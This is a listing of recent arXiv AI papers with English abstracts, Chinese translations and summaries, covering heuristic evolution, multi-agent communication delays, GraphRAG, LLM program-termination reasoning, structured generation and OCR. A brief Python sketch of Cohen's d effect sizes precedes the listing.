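To make the effect-size reporting concrete, here is a minimal sketch of Cohen's d with a pooled standard deviation. The abstract does not say which variant of Cohen's d was used, so the pooled form is an assumption, and the per-run accuracies below are invented toy values, not results from the paper.

```python
import statistics

def cohens_d(sample_a, sample_b):
    """Cohen's d: mean difference divided by the pooled standard deviation."""
    n_a, n_b = len(sample_a), len(sample_b)
    var_a = statistics.variance(sample_a)  # sample variance (n - 1 denominator)
    var_b = statistics.variance(sample_b)
    pooled_sd = (((n_a - 1) * var_a + (n_b - 1) * var_b) / (n_a + n_b - 2)) ** 0.5
    return (statistics.mean(sample_a) - statistics.mean(sample_b)) / pooled_sd

# Hypothetical per-run accuracies for two pipeline configurations.
hierarchical = [0.94, 0.96, 0.92, 0.95, 0.93]
basic = [0.88, 0.90, 0.86, 0.89, 0.87]

effect = cohens_d(hierarchical, basic)
print(round(effect, 2))
```

An effect size complements a significance test: with 50 runs per configuration even small differences can reach significance, so the magnitude matters. A Wilcoxon signed-rank test on paired runs is available in SciPy as `scipy.stats.wilcoxon`, which is left out here to keep the sketch dependency-free.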

2604.04940 2026-05-27 cs.AI 版本更新

ReVEL: Multi-Turn Reflective LLM-Guided Heuristic Evolution via Structured Performance Feedback

ReVEL:基于结构化性能反馈的多轮反思式LLM引导的启发式进化

Cuong Van Duc, Minh Nguyen Dinh Tuan, Tam Vu Duc, Tung Vu Duy, Son Nguyen Van, Hanh Nguyen Thi, Binh Huynh Thi Thanh

发表机构 * Hanoi University of Science and Technology(河内科学技术大学) Phenikaa University(Phenikaa大学)

AI总结 针对NP-hard组合优化问题的启发式设计,提出ReVEL框架,通过行为感知分组和多轮迭代细化,利用LLM和累积性能反馈联合优化启发式,实验表明优于现有LLM引导的进化基线。

详情
AI中文摘要

为NP-hard组合优化问题设计有效的启发式仍然具有挑战性,通常需要大量的领域专业知识。最近的LLM引导的进化方法在自动启发式生成方面显示出前景,但大多数现有方法独立地或通过有限的成对反馈来细化启发式。我们提出ReVEL:基于结构化性能反馈的多轮反思式LLM引导的启发式进化,一个用于群体式多轮启发式细化的框架。ReVEL将启发式组织成行为感知的反思组,包括用于局部细化的相似性驱动组和用于探索性搜索的多样性驱动组。在每个组内,LLM使用累积的性能反馈执行迭代多轮细化,使得相关启发式能够在进化迭代中被联合分析和逐步改进。在标准组合优化基准上的实验表明,ReVEL在多种设置和LLM骨干下通常优于现有的LLM引导的进化基线。额外分析表明,行为感知分组有助于在迭代启发式进化过程中实现更一致的细化轨迹。

英文摘要

Designing effective heuristics for NP-hard combinatorial optimization problems remains challenging and often requires substantial domain expertise. Recent LLM-guided evolutionary methods have shown promise for automated heuristic generation, but most existing approaches refine heuristics independently or through limited pairwise feedback. We propose ReVEL: Multi-Turn Reflective LLM-Guided Heuristic Evolution via Structured Performance Feedback, a framework for group-wise multi-turn heuristic refinement. ReVEL organizes heuristics into behavior-aware reflective groups, including similarity-driven groups for localized refinement and diversity-driven groups for exploratory search. Within each group, the LLM performs iterative multi-turn refinement using accumulated performance feedback, enabling related heuristics to be jointly analyzed and progressively improved across evolutionary iterations. Experiments on standard combinatorial optimization benchmarks show that ReVEL generally improves optimization performance over existing LLM-guided evolutionary baselines across multiple settings and LLM backbones. Additional analyses suggest that behavior-aware grouping contributes to more consistent refinement trajectories during iterative heuristic evolution.

1403.1076 2026-05-27 cs.AI 版本更新

A Discussion to Qualify Intelligence

关于智能定义的探讨

Kieran Greer

发表机构 * Distributed Computing Systems(分布式计算系统)

AI总结 本文试图提出一个适用于自然世界和人工智能的统一智能定义,基于Kolmogorov复杂性理论提出度量标准,并区分智能与意识的不同。

Comments Newly edited version

详情
Journal ref
Scientific Insights, 2(1), pp. 1 - 15
AI中文摘要

我们对智能的理解主要针对人类水平。本文试图给出一个更统一的定义,可应用于整个自然世界,然后应用于人工智能。该定义更侧重于定性而非定量,并可能有助于对此问题做出判断。虽然正确行为是首选定义,但本文提出了一种基于Kolmogorov复杂性理论的度量标准,该标准引出了关于熵的测量。随后,本文提出了一种公认的人工智能测试版本作为“酸性测试”,这可能是自由思维程序试图实现的目标。作者最近的工作更多是从机械过程的角度出发,基于结构构建。本文认为智能是一种主动事件,但也注意到其背后存在一个机械性的次要方面。本文建议将智能和意识视为略有不同,其中意识是更机械的方面。事实上,一个令人惊讶的结论是,一个被动但智能的大脑可能由主动但不太智能的感官所激发。

英文摘要

Our understanding of intelligence is directed primarily at the human level. This paper attempts to give a more unifying definition that can be applied to the natural world in general and then Artificial Intelligence. The definition would be used more to qualify than quantify it and might help when making judgements on the matter. While correct behaviour is the preferred definition, a metric that is grounded in Kolmogorov's Complexity Theory is suggested, which leads to a measurement about entropy. A version of an accepted AI test is then put forward as the 'acid test' and might be what a free-thinking program would try to achieve. Recent work by the author has been more from a direction of mechanical processes, built from structure. This paper agrees that intelligence is a pro-active event, but also notes a second aspect to it that is in the background and mechanical. The paper suggests looking at intelligence and the conscious as being slightly different, where the conscious is this more mechanical aspect. In fact, a surprising conclusion can be a passive but intelligent brain being invoked by active and less intelligent senses.

2604.03785 2026-05-27 cs.AI cs.MA 版本更新

Communication Gain and Delay Cost Under Cross-Timestep Delays in Cooperative Multi-Agent Reinforcement Learning

跨时间步延迟下合作多智能体强化学习中的通信增益与延迟代价

Zihong Gao, Hongjian Liang, Lei Hao, Liangjun Ke

发表机构 * The State Key Laboratory for Manufacturing Systems Engineering(制造系统工程国家重点实验室) School of Automation Science and Engineering, Xi’an Jiaotong University(西安交通大学自动化科学与工程学院)

AI总结 针对部分可观测环境中跨时间步通信延迟导致的信息错位问题,提出通信增益与延迟代价(CGDC)度量,并基于此设计演员-评论家框架CDCMA,通过预测未来观测和注意力融合延迟消息来提升合作多智能体强化学习的性能、鲁棒性和泛化能力。

详情
AI中文摘要

在部分可观测的合作多智能体强化学习中,通信对于协调至关重要,然而跨时间步延迟会导致消息在生成后多个时间步才到达,造成时间错位,使得信息在消费时变得陈旧。我们将此设定形式化为延迟通信部分可观测马尔可夫博弈(DeComm-POMG),并将消息的影响分解为通信增益和延迟代价,从而得到通信增益与延迟代价(CGDC)度量。我们进一步建立了一个价值损失界,表明由延迟消息引起的性能下降被一个折扣累积的信息差距所上界,该差距由及时消息与延迟消息所诱导的动作分布之间的差异衡量。在CGDC的指导下,我们提出了CDCMA,一个演员-评论家框架,该框架仅在预测CGDC为正时请求消息,预测未来观测以减少消费时的错位,并通过CGDC引导的注意力融合延迟消息。在无队友视觉变体的合作导航和捕食者-猎物任务以及多个延迟级别的SMAC地图上的实验表明,该方法在性能、鲁棒性和泛化能力上均有一致提升,消融实验验证了每个组件的有效性。

英文摘要

Communication is essential for coordination in cooperative multi-agent reinforcement learning under partial observability, yet cross-timestep delays cause messages to arrive multiple timesteps after generation, inducing temporal misalignment and making information stale when consumed. We formalize this setting as a delayed-communication partially observable Markov game (DeComm-POMG) and decompose a message's effect into communication gain and delay cost, yielding the Communication Gain and Delay Cost (CGDC) metric. We further establish a value-loss bound showing that the degradation induced by delayed messages is upper-bounded by a discounted accumulation of an information gap between the action distributions induced by timely versus delayed messages. Guided by CGDC, we propose CDCMA, an actor-critic framework that requests messages only when predicted CGDC is positive, predicts future observations to reduce misalignment at consumption, and fuses delayed messages via CGDC-guided attention. Experiments on no-teammate-vision variants of Cooperative Navigation and Predator Prey, and on SMAC maps across multiple delay levels show consistent improvements in performance, robustness, and generalization, with ablations validating each component.

2603.25152 2026-05-27 cs.AI cs.IR 版本更新

OMD-GraphRAG: Enhancing GraphRAG with Ontology-Guided Extraction, Multi-Dimensional Clustering and Dual-Channel Fusion

OMD-GraphRAG:利用本体引导提取、多维聚类和双通道融合增强GraphRAG

Jie Wang, Honghua Huang, Xi Ge, Jianhui Su, Wen Liu, Shiguo Lian

发表机构 * Data Science & Artificial Intelligence Research Institute(数据科学与人工智能研究院)

AI总结 提出OMD-GraphRAG框架,通过本体引导知识提取、多维社区聚类和双通道图检索融合,提升GraphRAG在复杂推理和多跳查询中的性能。

详情
AI中文摘要

检索增强生成(RAG)系统在复杂推理、多跳查询和领域特定问答中面临重大挑战。尽管现有的GraphRAG框架在结构化知识组织方面取得了进展,但在知识提取精度、社区报告完整性和检索性能方面仍存在局限性。本文提出OMD-GraphRAG,一个基于开源GraphRAG构建的增强框架。该框架引入了三项核心创新:(1)本体引导知识提取,使用预定义Schema指导LLM准确识别领域特定实体和关系;(2)多维社区聚类策略,通过对齐完成、基于属性的聚类和多跳关系聚类提高社区完整性;(3)双通道图检索融合,通过混合图和社区检索平衡问答准确性和性能。在MultiHop-RAG基准上的评估结果显示,OMD-GraphRAG在综合F1分数上优于主流开源解决方案(如LightRAG),特别是在推理和时间查询方面。

英文摘要

Retrieval-Augmented Generation (RAG) systems face significant challenges in complex reasoning, multi-hop queries, and domain-specific QA. While existing GraphRAG frameworks have made progress in structural knowledge organization, they still have limitations in knowledge extraction precision, community report integrity, and retrieval performance. This paper proposes OMD-GraphRAG, an enhanced framework built upon open-source GraphRAG. The framework introduces three core innovations: (1) Ontology-Guided Knowledge Extraction, which uses a predefined schema to guide LLMs in accurately identifying domain-specific entities and relations; (2) a Multi-Dimensional Community Clustering Strategy, which improves community completeness through alignment completion, attribute-based clustering, and multi-hop relationship clustering; (3) Dual-Channel Graph Retrieval Fusion, which balances QA accuracy and performance through hybrid graph and community retrieval. Evaluation results on the MultiHop-RAG benchmark show that OMD-GraphRAG outperforms mainstream open-source solutions (e.g., LightRAG) in comprehensive F1 scores, particularly on inference and temporal queries.

2603.28345 2026-05-27 cs.SE cs.AI 版本更新

Where Code Meets Natural Language: Taxonomy-Driven Information Flow Analysis for LLM-Integrated Applications

当代码遇见自然语言:基于分类法的LLM集成应用信息流分析

Zihao Xu, Xiao Cheng, Ruijie Meng, Yuekang Li

发表机构 * University of New South Wales(新南威尔士大学) Macquarie University(麦考瑞大学) National University of Singapore(新加坡国立大学)

AI总结 提出一种基于定量信息流理论的分类法,定义24个标签以跨越LLM调用的自然语言与编程语言边界,实现信息流分析,并在污点传播和程序切片中验证有效性。

详情
AI中文摘要

LLM API调用正成为一种普遍的程序构造,但它们创建了一个现有程序分析无法跨越的边界:运行时值进入自然语言提示,在LLM内部经过不透明处理,然后作为程序消费的代码、SQL、JSON或文本重新出现。每个跨函数边界跟踪数据的分析,包括污点分析、程序切片、依赖分析和变更影响分析,都依赖于被调用者的数据流摘要。LLM调用没有这样的摘要,在我们称为NL/PL边界处打破了所有这些分析。我们提出了第一个信息流方法来跨越这个边界。基于定量信息流理论,我们的分类法沿两个正交维度定义了24个标签:信息保留级别(从词汇保留到完全阻塞)和输出模态(自然语言、结构化格式、可执行工件)。我们从4,154个真实世界Python文件中标记了9,083个占位符-输出对,并通过Cohen's κ=0.82和近乎完全的覆盖率(0.01%无法分类)验证了可靠性。我们在两个下游应用中展示了分类法的实用性:(1)一个两阶段污点传播管道,结合基于分类法的过滤和LLM验证,在353个专家注释对上达到F1=0.923,并在六个真实世界OpenClaw提示注入案例上的跨语言验证进一步确认了有效性;(2)基于分类法的反向切片在包含非传播占位符的文件中将切片大小平均减少了15%。每个标签的分析显示,四个阻塞标签几乎涵盖了所有非传播情况,为工具构建者提供了可操作的过滤标准。

英文摘要

LLM API calls are becoming a ubiquitous program construct, yet they create a boundary that no existing program analysis can cross: runtime values enter a natural-language prompt, undergo opaque processing inside the LLM, and re-emerge as code, SQL, JSON, or text that the program consumes. Every analysis that tracks data across function boundaries, including taint analysis, program slicing, dependency analysis, and change-impact analysis, relies on dataflow summaries of callee behavior. LLM calls have no such summaries, breaking all of these analyses at what we call the NL/PL boundary. We present the first information-flow method to bridge this boundary. Grounded in quantitative information flow theory, our taxonomy defines 24 labels along two orthogonal dimensions: information preservation level (from lexically preserved to fully blocked) and output modality (natural language, structured format, executable artifact). We label 9,083 placeholder-output pairs from 4,154 real-world Python files and validate reliability with Cohen's $\kappa = 0.82$ and near-complete coverage (0.01\% unclassifiable). We demonstrate the taxonomy's utility on two downstream applications: (1)~a two-stage taint propagation pipeline combining taxonomy-based filtering with LLM verification achieves $F_1 = 0.923$ on 353 expert-annotated pairs, with cross-language validation on six real-world OpenClaw prompt injection cases further confirming effectiveness; (2)~taxonomy-informed backward slicing reduces slice size by a mean of 15\% in files containing non-propagating placeholders. Per-label analysis reveals that four blocked labels account for nearly all non-propagating cases, providing actionable filtering criteria for tool builders.
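
The two-stage taint pipeline described above (taxonomy-based filtering, then verification) might be organised roughly as follows. This is a sketch under stated assumptions: the abstract names only the two endpoints of the preservation dimension and the three output modalities, so the label strings, the `FlowLabel` type, and the `is_blocked` and `verify` callables are all hypothetical, and the verifier stands in for the LLM check rather than reproducing it.

```python
from dataclasses import dataclass
from typing import Callable, List, Tuple

# The three output modalities listed in the abstract.
MODALITIES = ("natural_language", "structured_format", "executable_artifact")


@dataclass(frozen=True)
class FlowLabel:
    preservation: str  # hypothetical values, e.g. "lexically_preserved" ... "fully_blocked"
    modality: str      # one of MODALITIES


def propagate_taint(
    pairs: List[Tuple[str, FlowLabel]],
    is_blocked: Callable[[FlowLabel], bool],
    verify: Callable[[str, FlowLabel], bool],
) -> List[str]:
    """Return the placeholders whose taint is taken to reach the LLM output."""
    # Stage 1: drop placeholder-output pairs whose label says the flow is blocked.
    candidates = [(name, label) for name, label in pairs if not is_blocked(label)]
    # Stage 2: keep only the candidates the (stubbed) verifier confirms.
    return [name for name, label in candidates if verify(name, label)]
```

Filtering first keeps the expensive verification step off the pairs that the taxonomy already marks as non-propagating.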

2601.18987 2026-05-27 cs.CL cs.AI cs.PL 版本更新

LLMs versus the Halting Problem: Characterizing Program Termination Reasoning

LLMs 与停机问题:程序终止推理的特征化

Oren Sultan, Jordi Armengol-Estape, Pascal Kesseli, Julien Vanegue, Dafna Shahaf, Yossi Adi, Peter O'Hearn

发表机构 * FAIR Team, Meta AI(Meta AI FAIR 团队) The Hebrew University of Jerusalem, Israel(耶路撒冷希伯来大学) Bloomberg, New York, USA(彭博社,纽约,美国) Imperial College London, UK(伦敦帝国理工学院,英国) University College London, UK(伦敦大学学院,英国)

AI总结 本文评估了前沿LLMs在程序终止推理上的能力,发现GPT-5和Claude Sonnet 4.5在C程序终止判断上达到顶级验证工具水平,但无法生成形式化证明,并引入分歧前置条件形式化描述非终止条件。

详情
AI中文摘要

判断程序是否终止是计算机科学中的一个核心问题。图灵的停机问题确立了终止的不可判定性,表明没有算法能普遍确定所有程序和输入的终止性。因此,验证工具近似地处理终止问题,有时无法证明或反驳;这些工具依赖于特定问题的架构,并且通常与特定的编程语言绑定。LLMs的最新进展提出了一个自然的问题:它们在多大程度上能够推理程序终止?我们在2025年国际软件验证竞赛(SV Comp)的一组多样化C程序上评估了前沿LLMs。我们的结果表明,GPT-5和Claude Sonnet 4.5(通过测试时缩放)达到了与顶级验证工具相当的分数。然而,尽管模型通常能正确推断程序是否终止,但它们经常无法构造一个见证作为形式化证明,揭示了语义识别与符号证明生成之间的差距。随着代码长度的增加,性能进一步下降。为了分析这一差距,我们引入了一个分歧前置条件形式化方法,将非终止条件描述为逻辑约束。我们希望这些发现能激励未来在现实世界终止基准测试、结合LLMs与符号验证方法的神经符号方法,以及更广泛地关于LLMs在其他不可判定问题上推理的研究。

英文摘要

Determining whether a program terminates is a central problem in computer science. Turing's Halting Problem established termination as undecidable, showing that no algorithm can universally determine termination for all programs and inputs. Hence, verification tools approximate termination, sometimes failing to prove or disprove it; these tools rely on problem-specific architectures and are usually tied to particular programming languages. Recent advances in LLMs raise a natural question: To what extent can they reason about program termination? We evaluate frontier LLMs on a diverse set of C programs from the International Competition on Software Verification (SV Comp) 2025. Our results show that GPT-5 and Claude Sonnet 4.5 achieve scores comparable to top-ranked verification tools (with test-time scaling). However, while models often correctly infer whether programs terminate, they frequently fail to construct a witness as a formal proof, revealing a gap between semantic recognition and symbolic proof generation. Performance further degrades as code length increases. To analyze this gap, we introduce a divergence precondition formulation that characterizes non-termination conditions as logical constraints. We hope these findings motivate future research on real-world termination benchmarks, neuro-symbolic approaches that combine LLMs with symbolic verification methods, and, more broadly, LLM reasoning on other undecidable problems.
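
To make the idea of a divergence precondition concrete, here is a small worked example. It is our own illustration, not taken from the paper or from SV-COMP: for the loop `while (x > 0) { x = x + y; }` over unbounded mathematical integers (an assumption; fixed-width C integers behave differently on overflow), the loop fails to terminate exactly when `x > 0` and `y >= 0`. The sketch states that constraint as a predicate and cross-checks it against a bounded simulation.

```python
def diverges(x: int, y: int) -> bool:
    """Divergence precondition for: while (x > 0) { x = x + y; }"""
    return x > 0 and y >= 0


def terminates_within(x: int, y: int, max_steps: int) -> bool:
    """Simulate the loop for at most max_steps iterations; True if it exits."""
    for _ in range(max_steps):
        if not (x > 0):
            return True  # loop guard failed, so the loop has exited
        x = x + y
    return not (x > 0)
```

The bounded simulation can only refute termination up to `max_steps`, whereas the predicate is a claim about all executions; that asymmetry is the gap between observing behaviour and stating a logical constraint.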

2603.25415 2026-05-27 cs.AI cs.RO 版本更新

Modernising Reinforcement Learning-Based Navigation for Embodied Semantic Scene Graph Generation

具身语义场景图生成的强化学习导航现代化

Roman Küble, Marco Hüller, Mrunmai Phatak, Rainer Lienhart, Jörg Hähner

发表机构 * Organic Computing Group(有机计算组) Machine Learning and Computer Vision Group(机器学习与计算机视觉组) University of Augsburg(奥格斯堡大学) Am Technologiezentrum 8(技术中心8号) Augsburg, Germany(德国奥格斯堡)

AI总结 提出模块化导航组件,通过替换策略优化方法和重新设计离散动作表示,现代化具身语义场景图生成中的决策过程,并评估不同动作集和策略结构对场景图完整性、执行安全性和导航行为的影响。

详情
AI中文摘要

语义世界模型使具身智能体能够推理对象、关系和空间上下文,超越纯几何表示。在有机计算中,此类模型是在不确定性和资源约束下实现目标驱动自适应的关键。核心挑战是在有限动作预算内获取最大化模型质量和下游实用性的观测。语义场景图(SSG)为此提供了结构紧凑的表示。然而,在有限动作视界内构建SSG需要探索策略,在信息增益与导航成本之间权衡,并决定何时额外动作的收益递减。本文提出了用于具身语义场景图生成的模块化导航组件,并通过替换策略优化方法和重新审视离散动作公式来现代化其决策。我们研究了紧凑和更细粒度的较大离散动作集,并比较了原子动作上的单头策略与动作组件上的分解多头策略。我们评估了课程学习和基于深度的可选碰撞监督,并评估了SSG完整性、执行安全性和导航行为。结果表明,仅替换优化算法在相同奖励塑造下相对于基线将SSG完整性提高了21%。深度主要影响执行安全性(无碰撞运动),而完整性基本保持不变。将现代优化与更细粒度、分解的动作表示相结合,产生了最强的完整性-效率权衡。

英文摘要

Semantic world models enable embodied agents to reason about objects, relations, and spatial context beyond purely geometric representations. In Organic Computing, such models are a key enabler for objective-driven self-adaptation under uncertainty and resource constraints. The core challenge is to acquire observations maximising model quality and downstream usefulness within a limited action budget. Semantic scene graphs (SSGs) provide a structured and compact representation for this purpose. However, constructing them within a finite action horizon requires exploration strategies that trade off information gain against navigation cost and decide when additional actions yield diminishing returns. This work presents a modular navigation component for Embodied Semantic Scene Graph Generation and modernises its decision-making by replacing the policy-optimisation method and revisiting the discrete action formulation. We study compact and finer-grained, larger discrete motion sets and compare a single-head policy over atomic actions with a factorised multi-head policy over action components. We evaluate curriculum learning and optional depth-based collision supervision, and assess SSG completeness, execution safety, and navigation behaviour. Results show that replacing the optimisation algorithm alone improves SSG completeness by 21\% relative to the baseline under identical reward shaping. Depth mainly affects execution safety (collision-free motion), while completeness remains largely unchanged. Combining modern optimisation with a finer-grained, factorised action representation yields the strongest overall completeness--efficiency trade-off.

2601.04426 2026-05-27 cs.AI 版本更新

XGrammar-2: Efficient Dynamic Structured Generation Engine for Agentic LLMs

XGrammar-2: 面向智能体LLM的高效动态结构化生成引擎

Linzhang Li, Yixin Dong, Guanjie Wang, Ziyi Xu, Alexander Jiang, Tianqi Chen

发表机构 * Shanghai Jiao Tong University(上海交通大学) Carnegie Mellon University(卡内基梅隆大学) Carnegie Mellon University, NVIDIA(卡内基梅隆大学,NVIDIA)

AI总结 针对智能体LLM中动态结构化生成(如工具调用和响应协议)的挑战,提出XGrammar-2引擎,通过标签触发结构切换和跨语法子结构缓存实现高效编译与近零开销。

Comments 10 pages, ACM CAIS 26

详情
AI中文摘要

现代LLM智能体越来越依赖动态结构化生成,例如工具调用和响应协议。与具有静态结构的传统结构化生成不同,这些工作负载在请求之间和请求内部都有变化,给现有引擎带来了新的挑战。我们提出了XGrammar-2,一种用于动态智能体工作负载的结构化生成引擎。我们的设计基于两个关键思想:对标签触发的结构切换的一流支持,以及跨具有不同输出结构的请求的细粒度重用。具体来说,XGrammar-2引入了TagDispatch用于动态结构调度,以及Cross-Grammar Cache用于跨语法的子结构级缓存重用。它通过基于Earley的自适应令牌掩码缓存、即时编译和重复状态压缩进一步提高了效率。实验表明,XGrammar-2的编译速度比先前的结构化生成引擎快6倍以上,并且在现代LLM服务系统中几乎为零的端到端开销。

英文摘要

Modern LLM agents increasingly rely on dynamic structured generation, such as tool calling and response protocols. Unlike traditional structured generation with static structures, these workloads vary both across requests and within a request, posing new challenges to existing engines. We present XGrammar-2, a structured generation engine for dynamic agentic workloads. Our design is based on two key ideas: first-class support for tag-triggered structure switching, and fine-grained reuse across requests with different output structures. Concretely, XGrammar-2 introduces TagDispatch for dynamic structural dispatching and Cross-Grammar Cache for substructure-level cache reuse across grammars. It further improves efficiency with an Earley-based adaptive token mask cache, just-in-time compilation, and repetition state compression. Experiments show that XGrammar-2 achieves over 6x faster compilation than prior structured generation engines, and incurs near-zero end-to-end overhead in modern LLM serving systems.
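
Tag-triggered structure switching can be pictured with a toy dispatcher. The sketch below is purely illustrative and does not use or reproduce the XGrammar-2 API: the function `dispatch`, the structure names, and the tag strings are hypothetical, and tokens are treated as whole strings rather than model vocabulary entries.

```python
from typing import Dict, List, Tuple

FREE_TEXT = "free_text"


def dispatch(tokens: List[str], triggers: Dict[str, str], end_tag: str) -> List[Tuple[str, str]]:
    """Label each token with the structure that constrains it when it is emitted."""
    active = FREE_TEXT
    labelled = []
    for tok in tokens:
        labelled.append((tok, active))
        if active == FREE_TEXT and tok in triggers:
            # A trigger tag switches the constraint for the tokens that follow.
            active = triggers[tok]
        elif active != FREE_TEXT and tok == end_tag:
            # The closing tag hands control back to unconstrained text.
            active = FREE_TEXT
    return labelled
```

In this picture a single response can move between unconstrained text and one or more constrained regions, which is the within-request variation the abstract refers to.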

2603.23994 2026-05-27 cs.LG cs.AI 版本更新

Understanding the Challenges in Iterative Generative Optimization with LLMs

理解大语言模型迭代生成优化中的挑战

Allen Nie, Xavier Daull, Zhiyi Kuang, Abhinav Akkiraju, Anish Chaudhuri, Max Piasevoli, Ryan Rong, YuCheng Yuan, Prerit Choudhary, Shannon Xiao, Rasool Fakoor, Adith Swaminathan, Ching-An Cheng

发表机构 * Google DeepMind(谷歌DeepMind) CNRS(国家科学研究中心) Stanford University(斯坦福大学) Carnegie Mellon University(卡内基梅隆大学) Microsoft(微软) AWS(亚马逊AWS) Netflix Research(Netflix研究) Microsoft Research(微软研究院)

AI总结 本文通过案例研究,揭示了在基于大语言模型的迭代生成优化中,起始工件、信用分配和批处理等隐藏设计选择对优化成败的决定性影响,并指出缺乏跨领域的通用学习循环设置方法是生产化和采用的主要障碍。

Comments 39 pages, 17 figures

详情
AI中文摘要

生成优化利用大型语言模型(LLMs)通过执行反馈迭代改进工件(如代码、工作流或提示)。这是一种构建自我改进代理的有前途的方法,但在实践中仍然脆弱:尽管有活跃的研究,只有9%的调查代理使用了任何自动优化。我们认为这种脆弱性是因为,为了建立学习循环,工程师必须做出“隐藏”的设计选择:优化器可以编辑什么,以及在每次更新时提供什么“正确”的学习证据?我们调查了影响大多数应用的三个因素:起始工件、执行轨迹的信用跨度,以及将试错批处理为学习证据。通过在MLAgentBench、Atari和BigBench Extra Hard中的案例研究,我们发现这些设计决策可以决定生成优化是否成功,然而它们在先前的工作中很少被明确说明。不同的起始工件决定了在MLAgentBench中哪些解决方案是可达到的,截断的轨迹仍然可以改进Atari代理,而更大的小批量并不会单调地改善BBEH上的泛化。我们得出结论,缺乏一种简单、通用的跨领域设置学习循环的方法是生产化和采用的主要障碍。我们为做出这些选择提供了实用指导。

英文摘要

Generative optimization uses large language models (LLMs) to iteratively improve artifacts (such as code, workflows or prompts) using execution feedback. It is a promising approach to building self-improving agents, yet in practice remains brittle: despite active research, only 9% of surveyed agents used any automated optimization. We argue that this brittleness arises because, to set up a learning loop, an engineer must make "hidden" design choices: What can the optimizer edit, and what is the "right" learning evidence to provide at each update? We investigate three factors that affect most applications: the starting artifact, the credit horizon for execution traces, and batching trials and errors into learning evidence. Through case studies in MLAgentBench, Atari, and BigBench Extra Hard, we find that these design decisions can determine whether generative optimization succeeds, yet they are rarely made explicit in prior work. Different starting artifacts determine which solutions are reachable in MLAgentBench, truncated traces can still improve Atari agents, and larger minibatches do not monotonically improve generalization on BBEH. We conclude that the lack of a simple, universal way to set up learning loops across domains is a major hurdle for productionization and adoption. We provide practical guidance for making these choices.
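
The three design choices named in the abstract can be made explicit as parameters of a learning loop. The following is a minimal sketch under our own assumptions, not the authors' setup: `run_trial` and `propose` are hypothetical callables (in a real system `propose` would be an LLM call), the accept-if-better rule is a simplification, and `credit_horizon` is assumed to be at least 1.

```python
from typing import Callable, List, Tuple


def mean(values: List[float]) -> float:
    return sum(values) / len(values)


def generative_optimize(
    start,                                   # choice 1: the starting artifact
    run_trial: Callable[[object], Tuple[list, float]],
    propose: Callable[[object, List[list]], object],
    steps: int,
    credit_horizon: int,                     # choice 2: how much of each trace is shown
    batch_size: int,                         # choice 3: trials batched per update
):
    current = start
    current_score = mean([run_trial(current)[1] for _ in range(batch_size)])
    for _ in range(steps):
        # Evidence: the last `credit_horizon` trace entries of each trial in the batch.
        evidence = [run_trial(current)[0][-credit_horizon:] for _ in range(batch_size)]
        candidate = propose(current, evidence)
        candidate_score = mean([run_trial(candidate)[1] for _ in range(batch_size)])
        if candidate_score > current_score:  # keep the edit only if it helps
            current, current_score = candidate, candidate_score
    return current
```

Writing the loop this way makes the "hidden" choices visible as arguments, so each one can be varied on its own.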

2603.20020 2026-05-27 cs.CV cs.AI 版本更新

Detached Skip-Links and $R$-Probe: Decoupling Feature Aggregation from Gradient Propagation for MLLM OCR

分离跳跃链接与$R$-探针:解耦特征聚合与梯度传播用于MLLM OCR

Ziye Yuan, Ruchang Yao, Chengxin Zheng, Yusheng Zhao, Daxiang Dong, Ming Zhang

发表机构 * State Key Laboratory for Multimedia Information Processing, School of Computer Science, PKU-Anker LLM Lab, Beijing Key Laboratory of Software and Hardware Cooperative Artificial Intelligence Systems, Peking University, Beijing, China(多媒体信息处理国家重点实验室,计算机科学学院,PKU-Anker LLM实验室,软件与硬件协同人工智能系统北京重点实验室,北京大学,北京,中国) Tsinghua University, Beijing, China(清华大学,北京,中国) Baidu Inc, Beijing, China(百度公司,北京,中国)

AI总结 针对多模态大语言模型在OCR任务中因梯度干扰导致细粒度视觉信息丢失的问题,提出分离跳跃链接(Detached Skip-Links)以解耦前向特征聚合与反向梯度传播,并引入$R$-探针($R$-Probe)诊断视觉令牌的可重构性,从而提升OCR及通用多模态任务性能。

Comments Accepted by ICML 2026. Ziye Yuan and Ruchang Yao contributed equally to this work (co-first authors, listed in random order)

详情
AI中文摘要

多模态大语言模型(MLLMs)擅长高级推理,但在OCR任务中失败,因为细粒度视觉细节被破坏或错位。我们发现了多层特征融合中一个被忽视的优化问题。跳跃路径引入了从高级语义目标到早期视觉层的直接反向传播路径。这种机制覆盖了低级信号并破坏了训练稳定性。为了缓解这种梯度干扰,我们提出了分离跳跃链接(Detached Skip-Links),这是一种最小的修改,在前向传播中重用浅层特征,同时在联合训练期间停止通过跳跃分支的梯度。这种非对称设计减少了梯度干扰,提高了稳定性和收敛性,且无需增加可学习参数。为了诊断细粒度信息是否被保留并可供LLM使用,我们引入了$R$-探针($R$-Probe),它使用从LLM前四分之一层初始化的浅层解码器测量投影视觉令牌的像素级可重构性。在多个ViT骨干网络和多模态基准测试中,以及高达7M训练样本的规模下,我们的方法持续改进了以OCR为中心的基准测试,并在通用多模态任务上取得了明显提升。

英文摘要

Multimodal large language models (MLLMs) excel at high-level reasoning yet fail on OCR tasks where fine-grained visual details are compromised or misaligned. We identify an overlooked optimization issue in multi-layer feature fusion. Skip pathways introduce direct back-propagation paths from high-level semantic objectives to early visual layers. This mechanism overwrites low-level signals and destabilizes training. To mitigate this gradient interference, we propose Detached Skip-Links, a minimal modification that reuses shallow features in the forward pass while stopping gradients through the skip branch during joint training. This asymmetric design reduces gradient interference, improving stability and convergence without adding learnable parameters. To diagnose whether fine-grained information is preserved and usable by an LLM, we introduce $R$-Probe, which measures pixel-level reconstructability of projected visual tokens using a shallow decoder initialized from the first quarter of the LLM layers. Across multiple ViT backbones and multimodal benchmarks, and at scales up to 7M training samples, our approach consistently improves OCR-centric benchmarks and delivers clear gains on general multimodal tasks.
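
The effect of detaching the skip branch can be written out in one line of calculus. The notation below is assumed for illustration and does not come from the abstract: $h_s$ is a shallow visual feature, $f$ stands for the deeper layers, $\operatorname{sg}$ is the stop-gradient operator, fusion is taken to be additive, and $J_f$ is the Jacobian of $f$ at $h_s$.

```latex
% Assumed notation: h_s shallow feature, f deeper layers, sg(.) stop-gradient,
% z fused feature, \mathcal{L} training loss, J_f Jacobian of f at h_s.
\begin{align*}
\text{ordinary skip:}\quad & z = f(h_s) + h_s,
  & \frac{\partial \mathcal{L}}{\partial h_s} &= \left(J_f^{\top} + I\right)\frac{\partial \mathcal{L}}{\partial z},\\
\text{detached skip:}\quad & z = f(h_s) + \operatorname{sg}(h_s),
  & \frac{\partial \mathcal{L}}{\partial h_s} &= J_f^{\top}\,\frac{\partial \mathcal{L}}{\partial z}.
\end{align*}
```

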